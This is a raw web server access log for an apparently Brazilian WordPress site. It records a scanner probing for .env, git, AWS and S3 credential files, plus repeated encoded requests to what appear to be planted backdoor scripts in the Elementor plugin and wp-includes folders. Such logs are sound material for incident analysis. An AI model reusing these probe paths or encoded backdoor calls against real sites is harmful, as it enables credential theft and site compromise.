74.7.244.31 - - [16/Mar/2026:02:28:25 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [16/Mar/2026:02:23:32 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323231322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383631322q3430653164663066626465383038346137393531353436656336333531613765222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:23:54 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323233342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383633342q6531666665653734303639623166323639376365613136633633383662333030222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:24:16 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323235362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383635362q6130653166333232356134616339333666633239353931353061643366656561222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:28:05 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
45.148.10.174 - - [16/Mar/2026:02:29:34 -0300] "GET / HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:29:35 -0300] "GET /.env HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:29:37 -0300] "GET /.env.bak HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:02:24:38 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323237382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383637382q6534626239663136636134663766646266363139613137323231306465303866222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
45.148.10.174 - - [16/Mar/2026:02:29:38 -0300] "GET /.env.save HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:02:24:59 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323239392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383639392q6633336430343239343163646361336565306234616165373365383966343163222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
45.148.10.174 - - [16/Mar/2026:02:29:39 -0300] "GET /.env.backup HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:29:44 -0300] "GET /backend/.env HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:29:48 -0300] "GET /admin/.env HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:29:52 -0300] "GET /.git/config HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:29:56 -0300] "GET /config.js HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
45.148.10.174 - - [16/Mar/2026:02:30:18 -0300] "GET /.aws/credentials HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:02:25:21 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323332312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383732312q6530343834343531633339653931626232643035666331653166636539353537222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
45.148.10.174 - - [16/Mar/2026:02:30:02 -0300] "GET /aws-config.js HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
45.148.10.174 - - [16/Mar/2026:02:30:05 -0300] "GET /aws.config.js HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:30:12 -0300] "GET /debug/ HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:30:18 -0300] "GET /.aws/config HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:30:24 -0300] "GET /aws-credentials HTTP/1.1" 200 74375 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
179.188.53.243 - - [16/Mar/2026:02:25:42 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323334322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383734322q6437373765623539323739363461303864323431636430323763646263623163222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
45.148.10.174 - - [16/Mar/2026:02:30:25 -0300] "GET /aws.json HTTP/1.1" 200 74371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
45.148.10.174 - - [16/Mar/2026:02:30:30 -0300] "GET /.s3cfg HTTP/1.1" 200 74379 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
179.188.53.243 - - [16/Mar/2026:02:26:03 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323336332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383736332q6666356463393338623535336539616434366232653832326631643162623332222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:29:38 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:26:27 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323338372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383738372q3039393666613639623662376535393837396361373034356632353431663639222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:26:48 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323430382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383830382q3262653065633439333732396364616630663337653331656166313039393236222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:27:09 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323432392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383832392q3664363466356133303762386239386635346234616431333662336331366637222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:27:30 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323435302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383835302q6234363433356635623034333666323362643832353630353438346233323636222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:27:51 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323437312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383837312q6431643834633334633264656230303739373764653631386162653861343236222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:31:26 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:28:12 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323439322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383839322q3864393861643232326465646236316135356465333234636163623536336362222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:28:33 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323531332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383931332q6331323264346336393161316262363163393664303162643339326437653131222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [16/Mar/2026:02:33:43 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.244.31 - - [16/Mar/2026:02:33:46 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [16/Mar/2026:02:28:54 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323533342p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383933342q3666303565643835323262393231383738323430626336656339616365373030222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:29:15 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323535352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383935352q3464356334353762373037306361353063343930636635396637396431306335222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:33:06 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:29:38 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323537382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383937382q3436313634633239653131323430393532333435643336656163636165323365222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:29:59 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323539392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633383939392q3531656538366239326165313332396334323134663434666263306161656666222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:30:25 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323632352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393032352q6132616437306135303461643239346436376231323539616532363639643430222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:30:46 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323634362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393034362q6361656230303138396239316663343636316435343437656663343337613037222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:31:07 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323636372p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393036372q3033333234326365633836366438613234666439383938623061353738646531222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:34:40 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:31:29 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323638392p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393038392q6433326364393836323863336435383536663231633933616136326161623134222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
204.12.208.18 - - [16/Mar/2026:02:36:26 -0300] "GET /wp-includes/imddc187/edit.php HTTP/1.1" 200 6 "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20"
179.188.53.243 - - [16/Mar/2026:02:31:50 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323731302p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393131302q3966623433613362643666626636323639303337633466633230626133363365222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:32:11 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323733312p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393133312q6332343038333630646236656234343934363234343730643361323064663038222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:32:32 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323735322p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393135322q6266396436613130633235616664353862666363653663303736313531353665222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:36:11 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
179.188.53.243 - - [16/Mar/2026:02:32:53 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323737332p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393137332q3235386335356231383564366664653837653635366366623330623739653935222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:33:15 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323739352p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393139352q3235626630386535633230353135653739376134333736633136393035613063222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
179.188.53.243 - - [16/Mar/2026:02:33:36 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323831362p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393231362q3063396334613538643539393735633839373434323638616364626631306432222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
74.7.228.16 - - [16/Mar/2026:02:38:44 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.244.31 - - [16/Mar/2026:02:38:49 -0300] "GET /robots.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
179.188.53.243 - - [16/Mar/2026:02:33:58 -0300] "GET /wp-content/plugins/elementor/modules/landing-pages/admin-menu-items/admin-menu-items/index.php?ARRAY=7o2230223n313737333634323833382p2231223n22687474703n5p2s5p2s7n733832367631332r726s61646s722r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313737333633393233382q6335323061353162663031633961653562383065306633633834653231386534222p2232223n223237386534656532343337383734333036663632333965386636356132646336222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33392q35312q36342q37362q38322q3237227q HTTP/1.1" 504 247 "-" "-"
69.197.179.242 - - [16/Mar/2026:02:37:48 -0300] "GET /wp-includes/imddc187/edit.php?id=212809 HTTP/1.1" 200 - "https://bandeirantesbombas.com.br/wp-includes/imddc187/edit.php?id=212809" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
